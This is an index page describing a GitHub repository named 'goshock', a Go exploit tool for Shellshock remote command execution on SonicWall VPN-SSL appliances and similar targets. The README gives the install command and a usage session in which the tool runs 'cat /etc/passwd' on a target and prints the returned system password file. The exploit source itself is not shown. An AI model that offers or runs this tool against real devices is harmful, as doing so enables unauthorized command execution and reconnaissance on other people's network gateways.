Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/gustavorobertux/goshock
SonicWall VPN-SSL Exploit* using Golang ( * and other targets vulnerable to shellshock ).
https://github.com/gustavorobertux/goshock
Last synced: about 2 months ago
JSON representation
SonicWall VPN-SSL Exploit* using Golang ( * and other targets vulnerable to shellshock ).
- Host: GitHub
- URL: https://github.com/gustavorobertux/goshock
- Owner: gustavorobertux
- Created: 2021-02-10T22:16:34.000Z (almost 4 years ago)
- Default Branch: main
- Last Pushed: 2021-02-11T01:35:04.000Z (almost 4 years ago)
- Last Synced: 2024-08-05T17:31:34.775Z (5 months ago)
- Language: Go
- Homepage:
- Size: 239 KB
- Stars: 18
- Watchers: 1
- Forks: 1
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - gustavorobertux/goshock - SonicWall VPN-SSL Exploit* using Golang ( * and other targets vulnerable to shellshock ). (Go)
README
# goshock
SonicWall VPN-SSL Exploit* using Golang ( * and other targets vulnerable to shellshock ).# Install
```
▶ go get -u -v github.com/gustavorobertux/goshock
```
# Basic Usage
```
▶ goshockTARGET> x.x.x.x
Linux Shell Command> cat /etc/passwdroot:x:0:0:root:/root:/usr/sbin/cli
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
mail:x:8:12:mail:/var/spool/mail:/bin/false
squid:x:23:23:ftp:/var/spool/squid:/bin/false
ntp:x:38:38::/etc/ntp:/bin/false
sshd:x:74:74:sshd:/var/empty:/bin/false
nobody:x:99:99:Nobody:/home/nobody:/bin/false
snort:x:100:101:ftp:/var/log/snort:/bin/false
logwatch:x:102:102::/var/log/logwatch:/bin/false
dnsmasq:x:103:103::/:/bin/false
cron:x:104:104::/:/bin/false
admin::105:105::/:/usr/sbin/cli
```
# Screenshot